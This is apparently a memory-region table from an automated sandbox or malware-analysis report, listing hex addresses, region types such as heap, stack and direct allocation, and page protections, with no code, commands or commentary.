page read and write
|
||
A3D000
|
stack
|
page read and write
|
||
AEE000
|
stack
|
page read and write
|
||
1052000
|
unkown
|
page readonly
|
||
2C7F000
|
stack
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
2D55000
|
heap
|
page read and write
|
||
81B0000
|
trusted library allocation
|
page read and write
|
||
7FC50000
|
direct allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
8FD000
|
stack
|
page read and write
|
||
61E00000
|
unkown
|
page readonly
|
||
4460000
|
direct allocation
|
page execute and read and write
|
||
181AB9D7000
|
heap
|
page read and write
|
||
359B000
|
heap
|
page read and write
|
||
67AD000
|
heap
|
page read and write
|
||
744A000
|
heap
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
3571000
|
heap
|
page read and write
|
||
7DE000
|
stack
|
page read and write
|
||
740D000
|
heap
|
page read and write
|
||
7174000
|
trusted library allocation
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
19B000
|
stack
|
page read and write
|
||
CC0000
|
heap
|
page read and write
|
||
2F25000
|
heap
|
page read and write
|
||
921000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
7227000
|
heap
|
page read and write
|
||
1116000
|
unkown
|
page write copy
|
||
8D0000
|
trusted library allocation
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
6621000
|
direct allocation
|
page read and write
|
||
6FD000
|
heap
|
page read and write
|
||
3D20000
|
direct allocation
|
page execute and read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
737000
|
stack
|
page read and write
|
||
2F1A000
|
heap
|
page read and write
|
||
3720000
|
direct allocation
|
page execute and read and write
|
||
544000
|
heap
|
page read and write
|
||
2F1D000
|
stack
|
page read and write
|
||
3B80000
|
direct allocation
|
page execute and read and write
|
||
1756000
|
heap
|
page read and write
|
||
51D0000
|
heap
|
page read and write
|
||
3D40000
|
direct allocation
|
page execute and read and write
|
||
63A000
|
heap
|
page read and write
|
||
2D5E000
|
heap
|
page read and write
|
||
9610000
|
trusted library allocation
|
page read and write
|
||
73C000
|
heap
|
page read and write
|
||
917000
|
heap
|
page read and write
|
||
2FAE000
|
stack
|
page read and write
|
||
37E0000
|
direct allocation
|
page execute and read and write
|
||
6D0000
|
heap
|
page read and write
|
||
722E000
|
heap
|
page read and write
|
||
3130000
|
heap
|
page read and write
|
||
2D80000
|
heap
|
page read and write
|
||
277D000
|
heap
|
page read and write
|
||
36D0000
|
direct allocation
|
page execute and read and write
|
||
79D000
|
stack
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
722E000
|
heap
|
page read and write
|
||
91FE000
|
stack
|
page read and write
|
||
2261000
|
direct allocation
|
page read and write
|
||
7FE38000
|
direct allocation
|
page read and write
|
||
71D6000
|
heap
|
page read and write
|
||
7295000
|
heap
|
page read and write
|
||
277C000
|
heap
|
page read and write
|
||
9C000
|
stack
|
page read and write
|
||
3C90000
|
direct allocation
|
page execute and read and write
|
||
2D7A000
|
heap
|
page read and write
|
||
1F5000
|
heap
|
page read and write
|
||
643000
|
heap
|
page read and write
|
||
6520000
|
direct allocation
|
page read and write
|
||
187E000
|
heap
|
page read and write
|
||
35A0000
|
direct allocation
|
page execute and read and write
|
||
900D000
|
stack
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
29CF000
|
stack
|
page read and write
|
||
4574000
|
direct allocation
|
page read and write
|
||
3620000
|
heap
|
page read and write
|
||
5B5000
|
heap
|
page read and write
|
||
6DF000
|
heap
|
page read and write
|
||
BC0000
|
heap
|
page read and write
|
||
8BA000
|
heap
|
page read and write
|
||
71D7000
|
heap
|
page read and write
|
||
4E1E000
|
stack
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
DC1000
|
unkown
|
page execute read
|
||
808000
|
heap
|
page read and write
|
||
8CC000
|
heap
|
page read and write
|
||
2FD0000
|
heap
|
page read and write
|
||
2D7A000
|
heap
|
page read and write
|
||
743C000
|
heap
|
page read and write
|
||
3E80000
|
direct allocation
|
page execute and read and write
|
||
CA1000
|
heap
|
page read and write
|
||
2B8D000
|
stack
|
page read and write
|
||
279B000
|
heap
|
page read and write
|
||
A17000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
78E000
|
stack
|
page read and write
|
||
3AF000
|
stack
|
page read and write
|
||
4430000
|
direct allocation
|
page execute and read and write
|
||
3A4000
|
heap
|
page read and write
|
||
8DC000
|
heap
|
page read and write
|
||
2FC0000
|
heap
|
page read and write
|
||
7429000
|
heap
|
page read and write
|
||
7182000
|
trusted library allocation
|
page read and write
|
||
CD1000
|
heap
|
page read and write
|
||
2298000
|
direct allocation
|
page read and write
|
||
88B000
|
heap
|
page read and write
|
||
DC0000
|
unkown
|
page readonly
|
||
807D000
|
stack
|
page read and write
|
||
790E000
|
stack
|
page read and write
|
||
CD0000
|
heap
|
page read and write
|
||
A18000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
30BE000
|
stack
|
page read and write
|
||
1117000
|
unkown
|
page write copy
|
||
7487000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
CC4000
|
heap
|
page read and write
|
||
2C07000
|
heap
|
page read and write
|
||
6F2000
|
heap
|
page read and write
|
||
C1E000
|
stack
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
CD0000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
7FDF8000
|
direct allocation
|
page read and write
|
||
820000
|
heap
|
page read and write
|
||
82E000
|
stack
|
page read and write
|
||
A1F000
|
stack
|
page read and write
|
||
2D7B000
|
heap
|
page read and write
|
||
7FD81000
|
direct allocation
|
page read and write
|
||
47E0000
|
heap
|
page read and write
|
||
71D6000
|
heap
|
page read and write
|
||
3F60000
|
direct allocation
|
page execute and read and write
|
||
C40000
|
heap
|
page read and write
|
||
3510000
|
direct allocation
|
page execute and read and write
|
||
3190000
|
heap
|
page read and write
|
||
1F9000
|
heap
|
page read and write
|
||
538000
|
unkown
|
page readonly
|
||
544000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
520000
|
heap
|
page read and write
|
||
CB0000
|
trusted library allocation
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
2F35000
|
heap
|
page read and write
|
||
C92000
|
trusted library allocation
|
page read and write
|
||
2F10000
|
heap
|
page read and write
|
||
7294000
|
heap
|
page read and write
|
||
1FA64970000
|
heap
|
page read and write
|
||
B00000
|
heap
|
page read and write
|
||
73EF000
|
stack
|
page read and write
|
||
CBD000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
7450000
|
heap
|
page read and write
|
||
343F000
|
direct allocation
|
page read and write
|
||
57ED000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
C50000
|
trusted library allocation
|
page read and write
|
||
2F39000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
651D000
|
direct allocation
|
page read and write
|
||
504E000
|
stack
|
page read and write
|
||
449E000
|
stack
|
page read and write
|
||
7435000
|
heap
|
page read and write
|
||
2D95000
|
heap
|
page read and write
|
||
48DE000
|
stack
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
26D0000
|
direct allocation
|
page read and write
|
||
D3E000
|
stack
|
page read and write
|
||
CD6000
|
heap
|
page read and write
|
||
8D3000
|
heap
|
page read and write
|
||
2AB8000
|
heap
|
page read and write
|
||
2BB0000
|
heap
|
page read and write
|
||
3560000
|
direct allocation
|
page execute and read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
701000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
9EA0000
|
trusted library allocation
|
page execute and read and write
|
||
7FE00000
|
direct allocation
|
page read and write
|
||
4400000
|
direct allocation
|
page execute and read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
5F0000
|
remote allocation
|
page read and write
|
||
111B000
|
unkown
|
page readonly
|
||
3170000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
9DA000
|
unkown
|
page execute and read and write
|
||
544000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
417000
|
unkown
|
page read and write
|
||
3800000
|
direct allocation
|
page execute and read and write
|
||
BD0000
|
heap
|
page read and write
|
||
35A8000
|
heap
|
page read and write
|
||
534000
|
unkown
|
page readonly
|
||
544000
|
heap
|
page read and write
|
||
4080000
|
direct allocation
|
page execute and read and write
|
||
225A000
|
direct allocation
|
page read and write
|
||
27A6000
|
trusted library allocation
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
40C0000
|
direct allocation
|
page execute and read and write
|
||
3A4000
|
heap
|
page read and write
|
||
7297000
|
heap
|
page read and write
|
||
71C4000
|
heap
|
page read and write
|
||
263E000
|
stack
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
2380000
|
heap
|
page read and write
|
||
150000
|
stack
|
page read and write
|
||
278F000
|
stack
|
page read and write
|
||
2D66000
|
heap
|
page read and write
|
||
DC1000
|
unkown
|
page execute read
|
||
71BA000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
81E5000
|
trusted library allocation
|
page read and write
|
||
8C2000
|
heap
|
page read and write
|
||
4500000
|
heap
|
page read and write
|
||
71D7000
|
heap
|
page read and write
|
||
7294000
|
heap
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
36D4000
|
direct allocation
|
page read and write
|
||
1780000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
4F5F000
|
stack
|
page read and write
|
||
23B0000
|
direct allocation
|
page read and write
|
||
330F000
|
stack
|
page read and write
|
||
725000
|
heap
|
page read and write
|
||
CBD000
|
heap
|
page read and write
|
||
3930000
|
direct allocation
|
page execute and read and write
|
||
8C0000
|
trusted library allocation
|
page read and write
|
||
A7E000
|
stack
|
page read and write
|
||
7FD42000
|
direct allocation
|
page read and write
|
||
2646000
|
trusted library allocation
|
page read and write
|
||
358F000
|
heap
|
page read and write
|
||
7FE4D000
|
direct allocation
|
page read and write
|
||
17DC000
|
heap
|
page read and write
|
||
44E6000
|
direct allocation
|
page read and write
|
||
68E000
|
stack
|
page read and write
|
||
3750000
|
direct allocation
|
page execute and read and write
|
||
3446000
|
direct allocation
|
page read and write
|
||
904000
|
heap
|
page read and write
|
||
2D20000
|
heap
|
page read and write
|
||
BF1000
|
heap
|
page read and write
|
||
30FA000
|
heap
|
page read and write
|
||
9BF000
|
stack
|
page read and write
|
||
2B4D000
|
heap
|
page read and write
|
||
4D3E000
|
stack
|
page read and write
|
||
69B2000
|
trusted library allocation
|
page read and write
|
||
646000
|
heap
|
page read and write
|
||
32E1000
|
direct allocation
|
page read and write
|
||
3D50000
|
direct allocation
|
page execute and read and write
|
||
1052000
|
unkown
|
page readonly
|
||
7FDE0000
|
direct allocation
|
page read and write
|
||
81B0000
|
trusted library allocation
|
page read and write
|
||
32D5000
|
direct allocation
|
page read and write
|
||
AC0000
|
heap
|
page read and write
|
||
81B0000
|
trusted library allocation
|
page read and write
|
||
8D0000
|
heap
|
page read and write
|
||
7294000
|
heap
|
page read and write
|
||
309F000
|
stack
|
page read and write
|
||
35A5000
|
heap
|
page read and write
|
||
7FD90000
|
direct allocation
|
page read and write
|
||
CC4000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
35A1000
|
heap
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
3310000
|
heap
|
page read and write
|
||
3990000
|
direct allocation
|
page execute and read and write
|
||
3A4000
|
heap
|
page read and write
|
||
901000
|
heap
|
page read and write
|
||
7FE40000
|
direct allocation
|
page read and write
|
||
30DE000
|
heap
|
page read and write
|
||
3A90000
|
direct allocation
|
page execute and read and write
|
||
17D4000
|
heap
|
page read and write
|
||
7FE15000
|
direct allocation
|
page read and write
|
||
2791000
|
heap
|
page read and write
|
||
8C5000
|
heap
|
page read and write
|
||
36E0000
|
direct allocation
|
page execute and read and write
|
||
74E000
|
stack
|
page read and write
|
||
2244000
|
direct allocation
|
page read and write
|
||
2500000
|
trusted library allocation
|
page read and write
|
||
34BD000
|
heap
|
page read and write
|
||
274A000
|
trusted library allocation
|
page read and write
|
||
CC2000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
4580000
|
direct allocation
|
page read and write
|
||
3A0000
|
heap
|
page read and write
|
||
39E0000
|
direct allocation
|
page execute and read and write
|
||
3440000
|
direct allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
104E000
|
unkown
|
page read and write
|
||
C25000
|
heap
|
page read and write
|
||
8D9000
|
heap
|
page read and write
|
||
2EDF000
|
stack
|
page read and write
|
||
3A80000
|
direct allocation
|
page execute and read and write
|
||
1DB9000
|
heap
|
page read and write
|
||
1052000
|
unkown
|
page readonly
|
||
3A4000
|
heap
|
page read and write
|
||
1FA000
|
heap
|
page read and write
|
||
7150000
|
trusted library allocation
|
page read and write
|
||
73C000
|
heap
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
3780000
|
direct allocation
|
page execute and read and write
|
||
3A4000
|
heap
|
page read and write
|
||
A6B000
|
unkown
|
page execute and read and write
|
||
180000
|
stack
|
page read and write
|
||
8E9000
|
heap
|
page read and write
|
||
3C80000
|
direct allocation
|
page execute and read and write
|
||
7419000
|
heap
|
page read and write
|
||
2B90000
|
heap
|
page read and write
|
||
3303000
|
direct allocation
|
page read and write
|
||
181AB970000
|
heap
|
page read and write
|
||
3BE0000
|
direct allocation
|
page execute and read and write
|
||
42D0000
|
direct allocation
|
page execute and read and write
|
||
7174000
|
trusted library allocation
|
page read and write
|
||
2E2F000
|
unkown
|
page read and write
|
||
886000
|
unkown
|
page execute and read and write
|
||
111A000
|
unkown
|
page write copy
|
||
CC2000
|
heap
|
page read and write
|
||
74D1000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
3370000
|
direct allocation
|
page execute and read and write
|
||
29C0000
|
trusted library allocation
|
page read and write
|
||
CD8000
|
heap
|
page read and write
|
||
4130000
|
direct allocation
|
page execute and read and write
|
||
181AB950000
|
heap
|
page read and write
|
||
74B7000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
27B7000
|
trusted library allocation
|
page read and write
|
||
2510000
|
heap
|
page read and write
|
||
321F000
|
stack
|
page read and write
|
||
71B0000
|
trusted library allocation
|
page read and write
|
||
58E000
|
stack
|
page read and write
|
||
3A00000
|
direct allocation
|
page execute and read and write
|
||
2688000
|
direct allocation
|
page read and write
|
||
250000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
2D30000
|
heap
|
page read and write
|
||
71D7000
|
heap
|
page read and write
|
||
26DF000
|
direct allocation
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
2B3F000
|
heap
|
page read and write
|
||
5BC000
|
heap
|
page read and write
|
||
1A4F000
|
stack
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
744D000
|
heap
|
page read and write
|
||
803000
|
heap
|
page read and write
|
||
4DF3000
|
heap
|
page execute and read and write
|
||
457B000
|
direct allocation
|
page read and write
|
||
C8E000
|
heap
|
page read and write
|
||
CD5000
|
heap
|
page read and write
|
||
73C000
|
heap
|
page read and write
|
||
8E2000
|
heap
|
page read and write
|
||
4BF0000
|
trusted library allocation
|
page read and write
|
||
2130000
|
heap
|
page read and write
|
||
9E4000
|
heap
|
page read and write
|
||
230C000
|
direct allocation
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
7370000
|
heap
|
page read and write
|
||
50A000
|
unkown
|
page read and write
|
||
915000
|
unkown
|
page execute and read and write
|
||
111B000
|
unkown
|
page readonly
|
||
211BDEF000
|
stack
|
page read and write
|
||
2C9D000
|
stack
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
264D000
|
trusted library allocation
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
7E0000
|
heap
|
page read and write
|
||
497E000
|
stack
|
page read and write
|
||
9D9000
|
heap
|
page read and write
|
||
185000
|
stack
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
30FA000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
5AD000
|
unkown
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
1FA64A80000
|
heap
|
page read and write
|
||
8D7000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
31C0000
|
direct allocation
|
page read and write
|
||
3240000
|
heap
|
page read and write
|
||
4450000
|
direct allocation
|
page execute and read and write
|
||
6EA000
|
heap
|
page read and write
|
||
35A5000
|
heap
|
page read and write
|
||
3BF0000
|
direct allocation
|
page execute and read and write
|
||
6670000
|
heap
|
page read and write
|
||
6EC000
|
heap
|
page read and write
|
||
36F0000
|
direct allocation
|
page execute and read and write
|
||
544000
|
heap
|
page read and write
|
||
7294000
|
heap
|
page read and write
|
||
2D36000
|
heap
|
page read and write
|
||
97E000
|
stack
|
page read and write
|
||
35A5000
|
heap
|
page read and write
|
||
510F57F000
|
stack
|
page read and write
|
||
41A0000
|
direct allocation
|
page execute and read and write
|
||
2268000
|
direct allocation
|
page read and write
|
||
35D0000
|
direct allocation
|
page execute and read and write
|
||
C25000
|
heap
|
page read and write
|
||
90C000
|
heap
|
page read and write
|
||
C25000
|
heap
|
page read and write
|
||
2F10000
|
heap
|
page read and write
|
||
938000
|
heap
|
page read and write
|
||
568B000
|
heap
|
page read and write
|
||
7378000
|
heap
|
page read and write
|
||
CCB000
|
heap
|
page read and write
|
||
2762000
|
heap
|
page read and write
|
||
90F000
|
heap
|
page read and write
|
||
4360000
|
direct allocation
|
page execute and read and write
|
||
CD4000
|
heap
|
page read and write
|
||
4180000
|
direct allocation
|
page execute and read and write
|
||
3240000
|
direct allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
921000
|
heap
|
page read and write
|
||
3AB0000
|
direct allocation
|
page execute and read and write
|
||
4DE0000
|
trusted library allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
1DBE000
|
heap
|
page read and write
|
||
181B000
|
heap
|
page read and write
|
||
4A8E000
|
stack
|
page read and write
|
||
3459000
|
direct allocation
|
page read and write
|
||
93000
|
stack
|
page read and write
|
||
81B0000
|
trusted library allocation
|
page read and write
|
||
2DB0000
|
heap
|
page read and write
|
||
2662000
|
direct allocation
|
page read and write
|
||
677D000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
2247000
|
direct allocation
|
page read and write
|
||
C90000
|
heap
|
page read and write
|
||
3B10000
|
direct allocation
|
page execute and read and write
|
||
34C4000
|
heap
|
page read and write
|
||
C0F000
|
heap
|
page read and write
|
||
7294000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
3920000
|
direct allocation
|
page execute and read and write
|
||
3EC0000
|
direct allocation
|
page execute and read and write
|
||
34C4000
|
heap
|
page read and write
|
||
770000
|
heap
|
page read and write
|
||
2CDF000
|
stack
|
page read and write
|
||
223F000
|
direct allocation
|
page read and write
|
||
111A000
|
unkown
|
page write copy
|
||
3F50000
|
direct allocation
|
page execute and read and write
|
||
34C4000
|
heap
|
page read and write
|
||
7607000
|
direct allocation
|
page read and write
|
||
7160000
|
trusted library allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
4140000
|
direct allocation
|
page execute and read and write
|
||
4556000
|
direct allocation
|
page read and write
|
||
2D7D000
|
stack
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
1666000
|
unkown
|
page execute and write copy
|
||
279A000
|
heap
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
3950000
|
direct allocation
|
page execute and read and write
|
||
22C4000
|
direct allocation
|
page read and write
|
||
211BD6E000
|
stack
|
page read and write
|
||
720F000
|
stack
|
page read and write
|
||
708000
|
heap
|
page read and write
|
||
3100000
|
heap
|
page read and write
|
||
22E3000
|
direct allocation
|
page read and write
|
||
35A7000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
2304000
|
direct allocation
|
page read and write
|
||
111B000
|
unkown
|
page readonly
|
||
3200000
|
heap
|
page read and write
|
||
26CD000
|
stack
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
929000
|
unkown
|
page execute and read and write
|
||
8E5000
|
heap
|
page read and write
|
||
6EF000
|
heap
|
page read and write
|
||
2F9000
|
stack
|
page read and write
|
||
4548000
|
direct allocation
|
page read and write
|
||
710000
|
heap
|
page read and write
|
||
304F000
|
stack
|
page read and write
|
||
34AC000
|
direct allocation
|
page read and write
|
||
71C6000
|
heap
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
7FE10000
|
direct allocation
|
page read and write
|
||
3AD0000
|
direct allocation
|
page execute and read and write
|
||
2D0E000
|
unkown
|
page read and write
|
||
33C8000
|
direct allocation
|
page read and write
|
||
3CD0000
|
direct allocation
|
page execute and read and write
|
||
DC0000
|
unkown
|
page readonly
|
||
35F0000
|
direct allocation
|
page execute and read and write
|
||
2F1F000
|
stack
|
page read and write
|
||
6D90000
|
heap
|
page execute and read and write
|
||
7060000
|
heap
|
page read and write
|
||
8B8000
|
heap
|
page read and write
|
||
42E0000
|
direct allocation
|
page execute and read and write
|
||
71C2000
|
heap
|
page read and write
|
||
3760000
|
direct allocation
|
page execute and read and write
|
||
2B60000
|
heap
|
page read and write
|
||
CC3000
|
heap
|
page read and write
|
||
7FE40000
|
direct allocation
|
page read and write
|
||
2F20000
|
heap
|
page read and write
|
||
2761000
|
heap
|
page read and write
|
||
7224000
|
heap
|
page read and write
|
||
36CD000
|
direct allocation
|
page read and write
|
||
111A000
|
unkown
|
page write copy
|
||
744A000
|
heap
|
page read and write
|
||
C21000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
2FFE000
|
stack
|
page read and write
|
||
95F000
|
stack
|
page read and write
|
||
AA3000
|
heap
|
page read and write
|
||
2F4E000
|
stack
|
page read and write
|
||
970000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
7160000
|
trusted library allocation
|
page read and write
|
||
7432000
|
heap
|
page read and write
|
||
890000
|
unkown
|
page execute and write copy
|
||
8FB000
|
heap
|
page read and write
|
||
291C000
|
stack
|
page read and write
|
||
710000
|
heap
|
page read and write
|
||
27A1000
|
heap
|
page read and write
|
||
7225000
|
heap
|
page read and write
|
||
CCA000
|
heap
|
page read and write
|
||
44A0000
|
direct allocation
|
page read and write
|
||
71C3000
|
heap
|
page read and write
|
||
463C000
|
direct allocation
|
page read and write
|
||
2C58000
|
heap
|
page read and write
|
||
71C2000
|
heap
|
page read and write
|
||
3DB0000
|
direct allocation
|
page execute and read and write
|
||
30D0000
|
heap
|
page read and write
|
||
9EB000
|
heap
|
page read and write
|
||
397E000
|
stack
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
98E000
|
stack
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
7419000
|
heap
|
page read and write
|
||
49B0000
|
heap
|
page read and write
|
||
32E3000
|
direct allocation
|
page read and write
|
||
278B000
|
heap
|
page read and write
|
||
2760000
|
trusted library allocation
|
page read and write
|
||
4050000
|
direct allocation
|
page execute and read and write
|
||
1116000
|
unkown
|
page write copy
|
||
412000
|
unkown
|
page write copy
|
||
3CA0000
|
direct allocation
|
page execute and read and write
|
||
41D0000
|
direct allocation
|
page execute and read and write
|
||
2757000
|
trusted library allocation
|
page read and write
|
||
2A8D000
|
stack
|
page read and write
|
||
3AF0000
|
direct allocation
|
page execute and read and write
|
||
4350000
|
direct allocation
|
page execute and read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
2681000
|
direct allocation
|
page read and write
|
||
6F7000
|
heap
|
page read and write
|
||
71C3000
|
heap
|
page read and write
|
||
9EC000
|
heap
|
page read and write
|
||
8E6000
|
heap
|
page read and write
|
||
71C2000
|
heap
|
page read and write
|
||
638000
|
stack
|
page read and write
|
||
3690000
|
heap
|
page read and write
|
||
7A0000
|
heap
|
page read and write
|
||
2F2A000
|
heap
|
page read and write
|
||
5050000
|
heap
|
page read and write
|
||
2F0E000
|
stack
|
page read and write
|
||
3572000
|
heap
|
page read and write
|
||
6F2000
|
heap
|
page read and write
|
||
74DD000
|
heap
|
page read and write
|
||
66DE000
|
stack
|
page read and write
|
||
70A000
|
heap
|
page read and write
|
||
3730000
|
direct allocation
|
page execute and read and write
|
||
7297000
|
heap
|
page read and write
|
||
2FAE000
|
stack
|
page read and write
|
||
C21000
|
heap
|
page read and write
|
||
6781000
|
heap
|
page read and write
|
||
930000
|
heap
|
page read and write
|
||
3BB0000
|
direct allocation
|
page execute and read and write
|
||
75D000
|
stack
|
page read and write
|
||
9FE000
|
stack
|
page read and write
|
||
1116000
|
unkown
|
page read and write
|
||
2300000
|
heap
|
page read and write
|
||
CC5000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
35A5000
|
heap
|
page read and write
|
||
3560000
|
heap
|
page read and write
|
||
2F20000
|
heap
|
page read and write
|
||
851000
|
heap
|
page read and write
|
||
744D000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
43E000
|
unkown
|
page readonly
|
||
22BC000
|
direct allocation
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
71B8000
|
heap
|
page read and write
|
||
8D9000
|
heap
|
page read and write
|
||
1F0000
|
heap
|
page read and write
|
||
35A5000
|
heap
|
page read and write
|
||
7731000
|
direct allocation
|
page read and write
|
||
81B0000
|
trusted library allocation
|
page read and write
|
||
741E000
|
heap
|
page read and write
|
||
2B61000
|
heap
|
page read and write
|
||
7FDF0000
|
direct allocation
|
page read and write
|
||
279B000
|
heap
|
page read and write
|
||
9AF000
|
stack
|
page read and write
|
||
358C000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
3710000
|
direct allocation
|
page execute and read and write
|
||
3396000
|
direct allocation
|
page execute and read and write
|
||
36F0000
|
heap
|
page read and write
|
||
27AA000
|
trusted library allocation
|
page read and write
|
||
1750000
|
heap
|
page read and write
|
||
44B2000
|
direct allocation
|
page read and write
|
||
2D68000
|
heap
|
page read and write
|
||
7FD2E000
|
direct allocation
|
page read and write
|
||
4FE1000
|
direct allocation
|
page read and write
|
||
3870000
|
direct allocation
|
page execute and read and write
|
||
907000
|
heap
|
page read and write
|
||
2D10000
|
heap
|
page read and write
|
||
2CBF000
|
stack
|
page read and write
|
||
28AE000
|
stack
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
722000
|
heap
|
page read and write
|
||
35AB000
|
heap
|
page read and write
|
||
17E3000
|
heap
|
page read and write
|
||
2787000
|
trusted library allocation
|
page read and write
|
||
918E000
|
stack
|
page read and write
|
||
3397000
|
heap
|
page read and write
|
||
7297000
|
heap
|
page read and write
|
||
71C5000
|
heap
|
page read and write
|
||
3E30000
|
direct allocation
|
page execute and read and write
|
||
B1E000
|
stack
|
page read and write
|
||
4902000
|
direct allocation
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
2641000
|
trusted library allocation
|
page read and write
|
||
2F18000
|
heap
|
page read and write
|
||
C0D000
|
heap
|
page read and write
|
||
7184000
|
trusted library allocation
|
page read and write
|
||
1EB000
|
stack
|
page read and write
|
||
4FE8000
|
direct allocation
|
page read and write
|
||
910000
|
heap
|
page read and write
|
||
270D000
|
stack
|
page read and write
|
||
3850000
|
direct allocation
|
page execute and read and write
|
||
3EF0000
|
direct allocation
|
page execute and read and write
|
||
34C4000
|
heap
|
page read and write
|
||
4030000
|
direct allocation
|
page execute and read and write
|
||
3EB0000
|
direct allocation
|
page execute and read and write
|
||
3CB0000
|
direct allocation
|
page execute and read and write
|
||
3A4000
|
heap
|
page read and write
|
||
2D6D000
|
heap
|
page read and write
|
||
16E0000
|
heap
|
page read and write
|
||
2C00000
|
heap
|
page read and write
|
||
2795000
|
heap
|
page read and write
|
||
61E88000
|
unkown
|
page read and write
|
||
19B000
|
stack
|
page read and write
|
||
111B000
|
unkown
|
page readonly
|
||
31C0000
|
direct allocation
|
page read and write
|
||
174000
|
stack
|
page read and write
|
||
30FF000
|
stack
|
page read and write
|
||
DC0000
|
unkown
|
page readonly
|
||
8CE000
|
stack
|
page read and write
|
||
3030000
|
heap
|
page read and write
|
||
2B2D000
|
stack
|
page read and write
|
||
488F000
|
stack
|
page read and write
|
||
35A1000
|
heap
|
page read and write
|
||
34C4000
|
heap
|
page read and write
|
||
452B000
|
direct allocation
|
page read and write
|
||
111B000
|
unkown
|
page readonly
|
||
36B0000
|
direct allocation
|
page read and write
|
||
A84000
|
unkown
|
page execute and read and write
|
||
5651000
|
heap
|
page read and write
|
||
60B000
|
heap
|
page read and write
|
||
8D2000
|
heap
|
page read and write
|
||
8790000
|
trusted library allocation
|
page read and write
|
||
2F9B000
|
heap
|
page read and write
|
||
4F20000
|
trusted library section
|
page readonly
|
||
8D0000
|
trusted library allocation
|
page read and write
|
||
A05000
|
heap
|
page read and write
|
||
869000
|
unkown
|
page execute and write copy
|
||
C25000
|
heap
|
page read and write
|
||
960F000
|
stack
|
page read and write
|
||
71D7000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
DC0000
|
unkown
|
page readonly
